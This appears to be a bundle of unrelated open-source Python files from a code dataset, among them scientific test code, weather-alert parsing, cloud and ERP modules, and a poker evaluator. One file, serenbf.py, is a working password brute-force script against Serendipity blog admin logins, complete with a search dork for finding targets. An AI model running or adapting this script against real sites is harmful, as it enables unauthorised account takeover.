# along with Iris. If not, see <http://www.gnu.org/licenses/>.
"""Integration tests for NAME to GRIB2 interoperability."""
from __future__ import (absolute_import, division, print_function)
from six.moves import (filter, input, map, range, zip) # noqa
# Import iris.tests first so that some things can be initialised before
# importing anything else.
import iris.tests as tests
import numpy as np
import iris
import iris.unit
def name_cb(cube, field, filename):
# NAME files give the time point at the end of the range but Iris'
# GRIB loader creates it in the middle (the GRIB file itself doesn't
# encode a time point). Here we make them consistent so we can
# easily compare them.
t_coord = cube.coord('time')
t_coord.points = t_coord.bounds[0][1]
fp_coord = cube.coord('forecast_period')
fp_coord.points = fp_coord.bounds[0][1]
# NAME contains extra vertical meta-data.
z_coord = cube.coords('height')
if z_coord:
z_coord[0].long_name = 'height above ground level'
z_coord = cube.coords('altitude')
if z_coord:
z_coord[0].long_name = 'altitude above sea level'
class TestNameToGRIB(tests.IrisTest):
def check_common(self, name_cube, grib_cube):
        self.assertTrue(np.allclose(name_cube.data, grib_cube.data))
self.assertTrue(
np.allclose(name_cube.coord('latitude').points,
grib_cube.coord('latitude').points))
self.assertTrue(
np.allclose(name_cube.coord('longitude').points,
grib_cube.coord('longitude').points - 360))
for c in ['height', 'time']:
if name_cube.coords(c):
self.assertEqual(name_cube.coord(c),
grib_cube.coord(c))
@tests.skip_data
def test_name2_field(self):
filepath = tests.get_data_path(('NAME', 'NAMEII_field.txt'))
name_cubes = iris.load(filepath)
for i, name_cube in enumerate(name_cubes):
with self.temp_filename('.grib2') as temp_filename:
iris.save(name_cube, temp_filename)
grib_cube = iris.load_cube(temp_filename, callback=name_cb)
self.check_common(name_cube, grib_cube)
self.assertCML(
grib_cube, tests.get_result_path(
('integration', 'name_grib', 'NAMEII',
'{}_{}.cml'.format(i, name_cube.name()))))
@tests.skip_data
def test_name3_field(self):
filepath = tests.get_data_path(('NAME', 'NAMEIII_field.txt'))
name_cubes = iris.load(filepath)
for i, name_cube in enumerate(name_cubes):
with self.temp_filename('.grib2') as temp_filename:
iris.save(name_cube, temp_filename)
grib_cube = iris.load_cube(temp_filename, callback=name_cb)
self.check_common(name_cube, grib_cube)
self.assertCML(
grib_cube, tests.get_result_path(
('integration', 'name_grib', 'NAMEIII',
'{}_{}.cml'.format(i, name_cube.name()))))
if __name__ == "__main__":
tests.main()
| decvalts/iris | lib/iris/tests/integration/format_interop/test_name_grib.py | Python | gpl-3.0 | 3,844 |
#!/usr/bin/python
#Serendipity Brute Force (serendipity_admin.php) POC
#Dork: "Powered by Serendipity" inurl:serendipity_admin.php
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import urllib2, sys, re, urllib
print "\n d3hydr8[at]gmail[dot]com SerenBF v1.0"
print "----------------------------------------------"
if len(sys.argv) != 4:
print "Usage: ./serenbf.py <site> <user> <wordlist>\n"
sys.exit(1)
if sys.argv[1][:7] != "http://":
host = "http://"+sys.argv[1]
else:
host = sys.argv[1]
print "[+] BruteForcing:",host
print "[+] User:",sys.argv[2]
try:
words = open(sys.argv[3], "r").readlines()
print "[+] Words Loaded",len(words),"\n"
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
for word in words:
login_form_seq = [
('serendipity[action]', 'admin'),
('serendipity[user]', sys.argv[2]),
('serendipity[pass]', word[:-1]),
('serendipity[auto]', 'on'),
('submit', 'Login >')]
login_form_data = urllib.urlencode(login_form_seq)
try:
req = urllib2.Request(url=host, data=login_form_data)
site = urllib2.urlopen(req).read()
except(urllib2.URLError):
site = ""
pass
#Change this response if different. (language)
if re.search("invalid username or password",site):
print "[-] Login Failed:",word[:-1]
else:
print "\n\t[!] Login Successfull:",sys.argv[2],word
sys.exit(1)
print "\n[-] Brute Complete\n"
| knightmare2600/d4rkc0de | bruteforce/serenbf.py | Python | gpl-2.0 | 1,418 |
"""Support NWS VTEC encoding"""
import re
from datetime import timezone, timedelta, datetime
from pyiem.util import LOG
VTEC_RE = (
r"(/([A-Z])\.([A-Z]+)\.([A-Z]+)\.([A-Z]+)\.([A-Z])\."
r"([0-9]+)\.([0-9TZ]+)-([0-9TZ]+)/)"
)
VTEC_CLASS = {
"O": "Operational",
"T": "Test",
"E": "Experimental",
"X": "Experimental VTEC",
}
VTEC_ACTION = {
"NEW": "issues",
"CON": "continues",
"EXA": "expands area to include",
"EXT": "extends time of",
"EXB": "extends time and expands area to include",
"UPG": "issues upgrade to",
"CAN": "cancels",
"EXP": "expires",
"ROU": "routine",
"COR": "corrects",
}
VTEC_SIGNIFICANCE = {
"W": "Warning",
"Y": "Advisory",
"A": "Watch",
"S": "Statement",
"O": "Outlook",
"N": "Synopsis",
"F": "Forecast",
}
# https://www.nws.noaa.gov/directives/sym/pd01017003curr.pdf
VTEC_PHENOMENA = {
"AF": "Ashfall",
"AS": "Air Stagnation",
"BH": "Beach Hazard",
"BS": "Blowing Snow",
"BW": "Brisk Wind",
"BZ": "Blizzard",
"CF": "Coastal Flood",
"DF": "Debris Flow",
"DS": "Dust Storm",
"DU": "Blowing Dust",
"EC": "Extreme Cold",
"EH": "Excessive Heat",
"EW": "Extreme Wind",
"FA": "Flood",
"FF": "Flash Flood",
"FG": "Dense Fog",
"FL": "Flood",
"FR": "Frost",
"FW": "Red Flag",
"FZ": "Freeze",
"GL": "Gale",
"HF": "Hurricane Force Wind",
"HI": "Inland Hurricane",
"HS": "Heavy Snow",
"HT": "Heat",
"HU": "Hurricane",
"HW": "High Wind",
"HY": "Hydrologic",
"HZ": "Hard Freeze",
"IP": "Sleet",
"IS": "Ice Storm",
"LB": "Lake Effect Snow and Blowing Snow",
"LE": "Lake Effect Snow",
"LO": "Low Water",
"LS": "Lakeshore Flood",
"LW": "Lake Wind",
"MA": "Marine",
"MF": "Marine Dense Fog",
"MH": "Marine Ashfall",
"MS": "Marine Dense Smoke",
"RB": "Small Craft for Rough",
"RP": "Rip Currents",
"SB": "Snow and Blowing",
"SC": "Small Craft",
"SE": "Hazardous Seas",
"SI": "Small Craft for Winds",
"SM": "Dense Smoke",
"SN": "Snow",
"SQ": "Snow Squall",
"SR": "Storm",
"SS": "Storm Surge",
"SU": "High Surf",
"SV": "Severe Thunderstorm",
"SW": "Small Craft for Hazardous Seas",
"TI": "Inland Tropical Storm",
"TO": "Tornado",
"TR": "Tropical Storm",
"TS": "Tsunami",
"TY": "Typhoon",
"UP": "Ice Accretion",
"WC": "Wind Chill",
"WI": "Wind",
"WS": "Winter Storm",
"WW": "Winter Weather",
"ZF": "Freezing Fog",
"ZR": "Freezing Rain",
"ZY": "Freezing Spray",
}
# Taken from http://www.weather.gov/help-map
# Not all of these are an exact match.
NWS_COLORS = {
"AF.W": "#A9A9A9",
"AF.Y": "#696969",
"AS.Y": "#808080",
"BH.S": "#40E0D0",
"BW.Y": "#D8BFD8",
"BZ.A": "#ADFF2F",
"BZ.W": "#FF4500",
"CF.A": "#66CDAA",
"CF.S": "#6B8E23",
"CF.W": "#228B22",
"CF.Y": "#7CFC00",
"DS.W": "#FFE4C4",
"DS.Y": "#BDB76B",
"DU.W": "#FFE4C4",
"DU.Y": "#BDB76B",
"EC.A": "#0000FF",
"EC.W": "#0000FF",
"EH.A": "#800000",
"EH.W": "#C71585",
"EH.Y": "#800000",
"EW.W": "#FF8C00",
"FA.A": "#2E8B57",
"FA.W": "#00FF00",
"FA.Y": "#00FF7F",
"FF.A": "#2E8B57",
"FF.S": "#8B0000",
"FF.W": "#8B0000",
"FG.Y": "#708090",
"FL.A": "#2E8B57",
"FL.S": "#00FF00",
"FL.W": "#00FF00",
"FL.Y": "#00FF7F",
"FR.Y": "#6495ED",
"FW.A": "#FFDEAD",
"FW.W": "#FF1493",
"FZ.A": "#00FFFF",
"FZ.W": "#483D8B",
"GL.A": "#FFC0CB",
"GL.W": "#DDA0DD",
"HF.A": "#9932CC",
"HF.W": "#CD5C5C",
"HT.Y": "#FF7F50",
"HU.A": "#FF00FF",
"HU.S": "#FFE4B5",
"HU.W": "#DC143C",
"HW.A": "#B8860B",
"HW.W": "#DAA520",
"HY.Y": "#00FF7F",
"HZ.A": "#4169E1",
"HZ.W": "#9400D3",
"IS.W": "#8B008B",
"LE.A": "#87CEFA",
"LE.W": "#008B8B",
"LE.Y": "#48D1CC",
"LO.Y": "#A52A2A",
"LS.A": "#66CDAA",
"LS.S": "#6B8E23",
"LS.W": "#228B22",
"LS.Y": "#7CFC00",
"LW.Y": "#D2B48C",
"MA.S": "#FFDAB9",
"MA.W": "#FFA500",
"MF.Y": "#708090",
"RB.Y": "#D8BFD8",
"RP.S": "#40E0D0",
"SC.Y": "#D8BFD8",
"SE.A": "#483D8B",
"SE.W": "#D8BFD8",
"SI.Y": "#D8BFD8",
"SM.Y": "#F0E68C",
"SQ.W": "#C71585",
"SR.A": "#FFE4B5",
"SR.W": "#9400D3",
"SS.A": "#DB7FF7",
"SS.W": "#C0C0C0",
"SU.W": "#228B22",
"SU.Y": "#BA55D3",
"SV.A": "#DB7093",
"SV.W": "#FFA500",
"SW.Y": "#D8BFD8",
"TO.A": "#FFFF00",
"TO.W": "#FF0000",
"TR.A": "#F08080",
"TR.S": "#FFE4B5",
"TR.W": "#B22222",
"TS.A": "#FF00FF",
"TS.W": "#FD6347",
"TS.Y": "#D2691E",
"TY.A": "#FF00FF",
"TY.W": "#DC143C",
"UP.A": "#4682B4",
"UP.W": "#8B008B",
"UP.Y": "#8B008B",
"WC.A": "#5F9EA0",
"WC.W": "#B0C4DE",
"WC.Y": "#AFEEEE",
"WI.Y": "#D2B48C",
"WS.A": "#4682B4",
"WS.W": "#FF69B4",
"WW.Y": "#7B68EE",
"ZF.Y": "#008080",
"ZR.Y": "#DA70D6",
}
def parse(text):
"""I look for and return vtec objects as I find them"""
vtec = []
tokens = re.findall(VTEC_RE, text)
for token in tokens:
vtec.append(VTEC(token))
return vtec
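# Hedged usage sketch (editor addition): the VTEC string below is made up but
# syntactically valid; it is not taken from a real NWS product.
#
#     vt = parse("/O.NEW.KDMX.TO.W.0045.210101T0000Z-210101T0100Z/")[0]
#     vt.office, vt.s2(), vt.etn    # -> ('DMX', 'TO.W', 45)
#     vt.get_ps_string()            # -> 'Tornado Warning'
#     vt.begints                    # -> 2021-01-01 00:00 UTC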
def contime(text):
"""Convert text into a UTC datetime."""
# The 0000 is the standard VTEC undefined time
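    # e.g. contime("210101T0000Z") -> datetime(2021, 1, 1, 0, 0, tzinfo=timezone.utc)
    # (illustrative value, editor comment)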
if text.startswith("0000"):
return None
try:
ts = datetime.strptime(text, "%y%m%dT%H%MZ")
except Exception as err:
LOG.exception(err)
return None
# NWS has a bug sometimes whereby 1969 or 1970s timestamps are emitted
if ts.year < 1971:
return None
return ts.replace(tzinfo=timezone.utc)
def get_ps_string(phenomena, significance):
"""Return the combination of Phenomena + Significance as string"""
pstr = VTEC_PHENOMENA.get(phenomena, f"Unknown {phenomena}")
astr = VTEC_SIGNIFICANCE.get(significance, f"Unknown {significance}")
# Hack for special FW case
if significance == "A" and phenomena == "FW":
pstr = "Fire Weather"
return f"{pstr} {astr}"
def get_action_string(action):
"""Return the action string"""
return VTEC_ACTION.get(action, f"unknown {action}")
class VTEC:
"""A single VTEC encoding instance"""
def __init__(self, tokens):
self.line = tokens[0]
self.status = tokens[1]
self.action = tokens[2]
self.office = tokens[3][1:]
self.office4 = tokens[3]
self.phenomena = tokens[4]
self.significance = tokens[5]
self.etn = int(tokens[6])
self.begints = contime(tokens[7])
self.endts = contime(tokens[8])
# Not explicitly defined, but set later by product parsing logic
self.year = None
def s3(self):
"""Return a commonly used string representation."""
return f"{self.phenomena}.{self.significance}.{self.etn}"
def s2(self):
"""Return a commonly used string representation."""
return f"{self.phenomena}.{self.significance}"
def get_end_string(self, prod):
"""Return an appropriate end string for this VTEC"""
if self.action in ["CAN", "EXP"]:
return ""
if self.endts is None:
return "until further notice"
fmt = "%b %-d, %-I:%M %p"
if self.endts < (prod.valid + timedelta(hours=1)):
fmt = "%-I:%M %p"
if prod.tz is None:
fmt = "%b %-d, %-H:%M"
localts = self.endts
if prod.tz is not None:
localts = self.endts.astimezone(prod.tz)
# A bit of complexity as offices may not implement daylight saving
if prod.z is not None and prod.z.endswith("ST") and localts.dst():
localts -= timedelta(hours=1)
return "till %s %s" % (
localts.strftime(fmt),
prod.z if prod.z is not None else "UTC",
)
def get_begin_string(self, prod):
"""Return an appropriate beginning string for this VTEC"""
if self.begints is None:
return ""
fmt = "%b %-d, %-I:%M %p"
if self.begints < (prod.valid + timedelta(hours=1)):
fmt = "%-I:%M %p"
localts = self.begints.astimezone(prod.tz)
# A bit of complexity as offices may not implement daylight saving
if prod.z.endswith("ST") and localts.dst():
localts -= timedelta(hours=1)
return "valid at %s %s" % (localts.strftime(fmt), prod.z)
def url(self, year):
"""Generate a VTEC url string needed"""
return ("%s-%s-%s-%s-%s-%s-%04i") % (
year if self.year is None else self.year,
self.status,
self.action,
self.office4,
self.phenomena,
self.significance,
self.etn,
)
def get_id(self, year):
"""Return a custom string identifier for this VTEC product
This is used by the Live client
"""
return "%s-%s-%s-%s-%04i" % (
year if self.year is None else self.year,
self.office4,
self.phenomena,
self.significance,
self.etn,
)
def __str__(self):
"""Return string representation"""
return self.line
def get_ps_string(self):
"""Return the combination of Phenomena + Significance as string"""
return get_ps_string(self.phenomena, self.significance)
def get_action_string(self):
"""Return the action string"""
return get_action_string(self.action)
def product_string(self):
"""Return the combination of action and phenomena+significance"""
return "%s %s" % (self.get_action_string(), self.get_ps_string())
| akrherz/pyIEM | src/pyiem/nws/vtec.py | Python | mit | 9,773 |
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
DRAC Driver for remote system management using Dell Remote Access Card.
"""
from oslo.utils import importutils
from ironic.common import exception
from ironic.common.i18n import _
from ironic.drivers import base
from ironic.drivers.modules.drac import management
from ironic.drivers.modules.drac import power
from ironic.drivers.modules import pxe
class PXEDracDriver(base.BaseDriver):
"""Drac driver using PXE for deploy."""
def __init__(self):
if not importutils.try_import('pywsman'):
raise exception.DriverLoadError(
driver=self.__class__.__name__,
reason=_('Unable to import pywsman library'))
self.power = power.DracPower()
self.deploy = pxe.PXEDeploy()
self.management = management.DracManagement()
| faizan-barmawer/openstack_ironic | ironic/drivers/drac.py | Python | apache-2.0 | 1,355 |
# -*- coding: utf-8 -*-
# Copyright (c) 2017, Frappe Technologies and contributors
# For license information, please see license.txt
import frappe
def run_webhooks(doc, method):
'''Run webhooks for this method'''
if frappe.flags.in_import or frappe.flags.in_patch or frappe.flags.in_install:
return
if frappe.flags.webhooks_executed is None:
frappe.flags.webhooks_executed = {}
if frappe.flags.webhooks == None:
# load webhooks from cache
webhooks = frappe.cache().get_value('webhooks')
if webhooks==None:
# query webhooks
webhooks_list = frappe.get_all('Webhook',
fields=["name", "webhook_docevent", "webhook_doctype"])
# make webhooks map for cache
webhooks = {}
for w in webhooks_list:
webhooks.setdefault(w.webhook_doctype, []).append(w)
frappe.cache().set_value('webhooks', webhooks)
frappe.flags.webhooks = webhooks
# get webhooks for this doctype
webhooks_for_doc = frappe.flags.webhooks.get(doc.doctype, None)
if not webhooks_for_doc:
# no webhooks, quit
return
def _webhook_request(webhook):
if not webhook.name in frappe.flags.webhooks_executed.get(doc.name, []):
frappe.enqueue("frappe.integrations.doctype.webhook.webhook.enqueue_webhook", doc=doc, webhook=webhook)
# keep list of webhooks executed for this doc in this request
# so that we don't run the same webhook for the same document multiple times
# in one request
frappe.flags.webhooks_executed.setdefault(doc.name, []).append(webhook.name)
event_list = ["on_update", "after_insert", "on_submit", "on_cancel", "on_trash"]
if not doc.flags.in_insert:
# value change is not applicable in insert
event_list.append('on_change')
event_list.append('before_update_after_submit')
for webhook in webhooks_for_doc:
event = method if method in event_list else None
if event and webhook.webhook_docevent == event:
_webhook_request(webhook)
| mbauskar/frappe | frappe/integrations/doctype/webhook/__init__.py | Python | mit | 1,894 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2018, Abhijeet Kasurde <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = r'''
---
module: vmware_host_ssl_facts
short_description: Gather facts of ESXi host system about SSL
description:
- This module can be used to gather facts of the SSL thumbprint information for a host.
version_added: 2.7
author:
- Abhijeet Kasurde (@Akasurde)
notes:
- Tested on vSphere 6.5
requirements:
- python >= 2.6
- PyVmomi
options:
cluster_name:
description:
- Name of the cluster.
- SSL thumbprint information about all ESXi host system in the given cluster will be reported.
- If C(esxi_hostname) is not given, this parameter is required.
type: str
esxi_hostname:
description:
- ESXi hostname.
- SSL thumbprint information of this ESXi host system will be reported.
- If C(cluster_name) is not given, this parameter is required.
type: str
extends_documentation_fragment: vmware.documentation
'''
EXAMPLES = r'''
- name: Gather SSL thumbprint information about all ESXi Hosts in given Cluster
vmware_host_ssl_facts:
hostname: '{{ vcenter_hostname }}'
username: '{{ vcenter_username }}'
password: '{{ vcenter_password }}'
cluster_name: '{{ cluster_name }}'
delegate_to: localhost
register: all_host_ssl_facts
- name: Get SSL Thumbprint info about "{{ esxi_hostname }}"
vmware_host_ssl_facts:
hostname: "{{ vcenter_server }}"
username: "{{ vcenter_user }}"
password: "{{ vcenter_pass }}"
esxi_hostname: '{{ esxi_hostname }}'
register: ssl_facts
- set_fact:
ssl_thumbprint: "{{ ssl_facts['host_ssl_facts'][esxi_hostname]['ssl_thumbprints'][0] }}"
- debug:
msg: "{{ ssl_thumbprint }}"
- name: Add ESXi Host to vCenter
vmware_host:
hostname: '{{ vcenter_hostname }}'
username: '{{ vcenter_username }}'
password: '{{ vcenter_password }}'
datacenter_name: '{{ datacenter_name }}'
cluster_name: '{{ cluster_name }}'
esxi_hostname: '{{ esxi_hostname }}'
esxi_username: '{{ esxi_username }}'
esxi_password: '{{ esxi_password }}'
esxi_ssl_thumbprint: '{{ ssl_thumbprint }}'
state: present
'''
RETURN = r'''
host_ssl_facts:
description:
- dict with hostname as key and dict with SSL thumbprint related facts
returned: facts
type: dict
sample:
{
"10.76.33.215": {
"owner_tag": "",
"principal": "vpxuser",
"ssl_thumbprints": [
"E3:E8:A9:20:8D:32:AE:59:C6:8D:A5:91:B0:20:EF:00:A2:7C:27:EE",
"F1:AC:DA:6E:D8:1E:37:36:4A:5C:07:E5:04:0B:87:C8:75:FB:42:01"
]
}
}
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.vmware import vmware_argument_spec, PyVmomi
class VMwareHostSslManager(PyVmomi):
def __init__(self, module):
super(VMwareHostSslManager, self).__init__(module)
cluster_name = self.params.get('cluster_name', None)
esxi_host_name = self.params.get('esxi_hostname', None)
self.hosts = self.get_all_host_objs(cluster_name=cluster_name, esxi_host_name=esxi_host_name)
self.hosts_facts = {}
def gather_ssl_facts(self):
for host in self.hosts:
self.hosts_facts[host.name] = dict(principal='',
owner_tag='',
ssl_thumbprints=[])
host_ssl_info_mgr = host.config.sslThumbprintInfo
if host_ssl_info_mgr:
self.hosts_facts[host.name]['principal'] = host_ssl_info_mgr.principal
self.hosts_facts[host.name]['owner_tag'] = host_ssl_info_mgr.ownerTag
self.hosts_facts[host.name]['ssl_thumbprints'] = [i for i in host_ssl_info_mgr.sslThumbprints]
self.module.exit_json(changed=False, host_ssl_facts=self.hosts_facts)
def main():
argument_spec = vmware_argument_spec()
argument_spec.update(
cluster_name=dict(type='str'),
esxi_hostname=dict(type='str'),
)
module = AnsibleModule(
argument_spec=argument_spec,
required_one_of=[
['cluster_name', 'esxi_hostname'],
],
supports_check_mode=True,
)
vmware_host_accept_config = VMwareHostSslManager(module)
vmware_host_accept_config.gather_ssl_facts()
if __name__ == "__main__":
main()
| cchurch/ansible | lib/ansible/modules/cloud/vmware/vmware_host_ssl_facts.py | Python | gpl-3.0 | 4,711 |
import os
from distutils.core import setup
def read_file_into_string(filename):
path = os.path.abspath(os.path.dirname(__file__))
filepath = os.path.join(path, filename)
try:
return open(filepath).read()
except IOError:
return ''
def get_readme():
for name in ('README', 'README.rst', 'README.md'):
if os.path.exists(name):
return read_file_into_string(name)
return ''
setup(
name='kb-search',
packages=['search', 'search.tests'],
package_data={
'search': [
'templates/*.*',
'templates/search/*.*',
],
},
version='0.1.24',
description='Search',
author='Patrick Kimber',
author_email='[email protected]',
url='[email protected]:pkimber/search.git',
classifiers=[
'Development Status :: 1 - Planning',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Framework :: Django :: 1.8',
'Topic :: Office/Business :: Scheduling',
],
long_description=get_readme(),
) | pkimber/search | setup.py | Python | apache-2.0 | 1,294 |
# Copyright (C) 2003 CAMP
# Please see the accompanying LICENSE file for further information.
from os import path
try:
from subprocess import Popen, PIPE
except ImportError:
from os import popen3
else:
def popen3(cmd):
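        # Fallback shim: emulate os.popen3() on top of subprocess.Popen,
        # returning the (stdin, stdout, stderr) file objects of the child.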
p = Popen(cmd, shell=True, close_fds=True,
stdin=PIPE, stdout=PIPE, stderr=PIPE)
return p.stdin, p.stdout, p.stderr
def write_svnversion(svnversion, dir):
svnversionfile = path.join(dir, 'svnversion.py')
f = open(svnversionfile,'w')
f.write('svnversion = "%s"\n' % svnversion)
f.close()
print 'svnversion = ' +svnversion+' written to '+svnversionfile
# assert svn:ignore property if the installation is under svn control
# because svnversion.py has to be ignored by svn!
cmd = popen3('svn propset svn:ignore svnversion.py '+dir)[1]
output = cmd.read()
cmd.close()
def get_svnversion_from_svn(dir):
# try to get the last svn version number from svnversion
cmd = popen3('svnversion -n '+dir)[1] # assert we are in the project dir
output = cmd.read().strip()
cmd.close()
if not (output + ' ')[0].isdigit():
# we build from exported source (e.g. rpmbuild)
output = None
return output
svnversion = get_svnversion_from_svn(dir='gpaw')
if svnversion:
write_svnversion(svnversion, dir='gpaw')
| robwarm/gpaw-symm | gpaw/svnversion_io.py | Python | gpl-3.0 | 1,339 |
#-*- coding:utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>). All Rights Reserved
#    $Id$
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Payroll',
'version': '1.0',
'category': 'Human Resources',
'sequence': 38,
'description': """
Generic Payroll system.
=======================
* Employee Details
* Employee Contracts
* Passport based Contract
* Allowances/Deductions
* Allow to configure Basic/Gross/Net Salary
* Employee Payslip
* Monthly Payroll Register
* Integrated with Holiday Management
""",
'author':'OpenERP SA',
'website':'http://www.openerp.com',
'images': ['images/hr_company_contributions.jpeg','images/hr_salary_heads.jpeg','images/hr_salary_structure.jpeg','images/hr_employee_payslip.jpeg'],
'depends': [
'hr',
'hr_contract',
'hr_holidays',
'decimal_precision',
],
'data': [
'security/hr_security.xml',
'wizard/hr_payroll_payslips_by_employees.xml',
'hr_payroll_view.xml',
'hr_payroll_workflow.xml',
'hr_payroll_sequence.xml',
'hr_payroll_report.xml',
'hr_payroll_data.xml',
'security/ir.model.access.csv',
'wizard/hr_payroll_contribution_register_report.xml',
'res_config_view.xml',
],
'test': [
'test/payslip.yml',
# 'test/payment_advice.yml',
# 'test/payroll_register.yml',
# 'test/hr_payroll_report.yml',
],
'demo': ['hr_payroll_demo.xml'],
'installable': True,
'auto_install': False,
'application': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| inovtec-solutions/OpenERP | openerp/addons/hr_payroll/__openerp__.py | Python | agpl-3.0 | 2,526 |
import Gears as gears
from .. import *
class Gaussian(Component) :
def applyWithArgs(
self,
patch,
*,
maxValue : 'Gaussian function peak [um].'
= 1,
variance : 'Gaussian variance [um].'
= 200
) :
patch.setShaderVariable( name = 'gaussianVariance', value = variance )
patch.setShaderVariable( name = 'gaussianPeak', value = maxValue )
patch.setShaderFunction( name = 'shape', src = '''
vec3 shape(vec2 x){
float diff = length(x);
            float g = gaussianPeak * exp( - diff * diff / gaussianVariance * 0.5 );
return vec3(g, g, g);
}
''' )
| szecsi/Gears | GearsPy/Project/PatternYard/Shape/Gaussian.py | Python | gpl-2.0 | 803 |
from numpy import *
import random
from util import *
from itertools import *
from handEvaluator import evalHand
from scipy import special  # assumed provider of binom(); not supplied by the numpy star import above
import cardsDict
def evalHandPair(handA, handB, unseenCards, size):
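    """Estimate the probability that handA beats or ties handB once both are
    completed to five cards from unseenCards. All completions are enumerated
    when their count does not exceed `size`; otherwise `size` random deals
    are sampled (Monte Carlo)."""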
complementSizeA = 5 - len(handA)
complementSizeB = 5 - len(handB)
sample = list(unseenCards)
sampleSize = len(sample)
wins = 0
count = 0
maxA = special.binom(sampleSize, complementSizeA)
maxB = special.binom(sampleSize -complementSizeA, complementSizeB)
maxSampleSize = mul(maxA, maxB)
if maxSampleSize <= size and maxSampleSize > 0:
for combA in combinations(sample, complementSizeA ) :
tmpHandA = handA[:]
tmpHandA.extend(combA)
tmpSample = unseenCards - set(combA)
for combB in combinations(tmpSample, complementSizeB) :
count+=1
tmpHandB = handB[:]
tmpHandB.extend(combB)
diff = evalHand(tmpHandA) - evalHand(tmpHandB)
win = diff >=0 and 1 or 0
wins += win
return float(wins)/float(maxSampleSize)
else:
while count < size:
count += 1
complementA = set(random.sample(unseenCards, complementSizeA) )
tmpUnseenCards = unseenCards - complementA
complementB = random.sample(tmpUnseenCards, complementSizeB)
tmpHandA = handA[:]
tmpHandA.extend(complementA)
tmpHandB = handB[:]
tmpHandB.extend(complementB)
diff = evalHand(tmpHandA) - evalHand(tmpHandB)
win = diff >=0 and 1 or 0
wins += win
return float(wins)/float(count)
class MonteCarloEvaluator:
def __init__(self, state, agentIndex, size = 1000):
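        """Reveal the next card from the deck to the agent and precompute, for
        each of the five hands, the probability of winning that hand before the
        new card is placed."""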
self.size = size
self.state = state.deepcopy()
self.agentIndex = agentIndex
self.nextCard = state.getDeck().pop()
self.state.getAgentState(self.agentIndex).configuration.revealCard(self.nextCard)
self.unseenCards = set(self.state.getAgentState(agentIndex).getUnseenCards() )
self.handsA = state.getHands(agentIndex)
self.handsB = state.getOppHands(agentIndex)
self.preActionProbs = dict()
for i in range(5):
handName = cardsDict._HANDS[i]
self.preActionProbs[handName] = evalHandPair(self.handsA[handName], self.handsB[handName], self.unseenCards, self.size)
def eval(self, action):
tmpHandA = self.handsA[action][:]
tmpHandA.append(self.nextCard)
postActionProb = evalHandPair(tmpHandA, self.handsB[action], self.unseenCards, self.size)
postActionProbs = deepish_copy(self.preActionProbs)
postActionProbs[action] = postActionProb
winProb = self.getWinProb(postActionProbs)
return winProb
def getWinProb(self, actionProbsDict):
"""
        actionProbsDict: maps each of the five hand names to its per-hand win probability;
        returns the probability of winning at least three of the five hands (independence assumed).
"""
combos3 = combinations(actionProbsDict.keys(), 3)
combos4 = combinations(actionProbsDict.keys(), 4)
combos5 = combinations(actionProbsDict.keys(), 5)
totalProb = 0
for combo in combos3:
tmpProbs = []
for action, prob in actionProbsDict.items():
if action in combo : tmpProbs.append(prob)
else : tmpProbs.append(1-prob)
totalProb += prod(tmpProbs)
for combo in combos4:
tmpProbs = []
for action, prob in actionProbsDict.items():
if action in combo : tmpProbs.append(prob)
else : tmpProbs.append(1-prob)
totalProb += prod(tmpProbs)
for combo in combos5:
tmpProbs = []
for action, prob in actionProbsDict.items():
if action in combo : tmpProbs.append(prob)
else : tmpProbs.append(1-prob)
totalProb += prod(tmpProbs)
return totalProb
| mosem/FiveOPoker | Program/monteCarloEvaluator.py | Python | mit | 3,996 |
""" Module that contains simple client access to Matcher service
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
__RCSID__ = "$Id$"
from DIRAC.Core.Base.Client import Client, createClient
from DIRAC.Core.Utilities.DEncode import ignoreEncodeWarning
from DIRAC.Core.Utilities.JEncode import strToIntDict
@createClient('WorkloadManagement/Matcher')
class MatcherClient(Client):
""" Exposes the functionality available in the WorkloadManagement/MatcherHandler
This inherits the DIRAC base Client for direct execution of server functionality.
The following methods are available (although not visible here).
"""
def __init__(self, **kwargs):
""" Simple constructor
"""
super(MatcherClient, self).__init__(**kwargs)
self.setServer('WorkloadManagement/Matcher')
@ignoreEncodeWarning
def getMatchingTaskQueues(self, resourceDict):
""" Return all task queues that match the resourceDict
"""
res = self._getRPC().getMatchingTaskQueues(resourceDict)
if res["OK"]:
# Cast the string back to int
res['Value'] = strToIntDict(res['Value'])
return res
@ignoreEncodeWarning
def getActiveTaskQueues(self):
""" Return all active task queues
"""
res = self._getRPC().getActiveTaskQueues()
if res["OK"]:
# Cast the string back to int
res['Value'] = strToIntDict(res['Value'])
return res
| yujikato/DIRAC | src/DIRAC/WorkloadManagementSystem/Client/MatcherClient.py | Python | gpl-3.0 | 1,451 |
from .. import Provider as CompanyProvider
class Provider(CompanyProvider):
formats = (
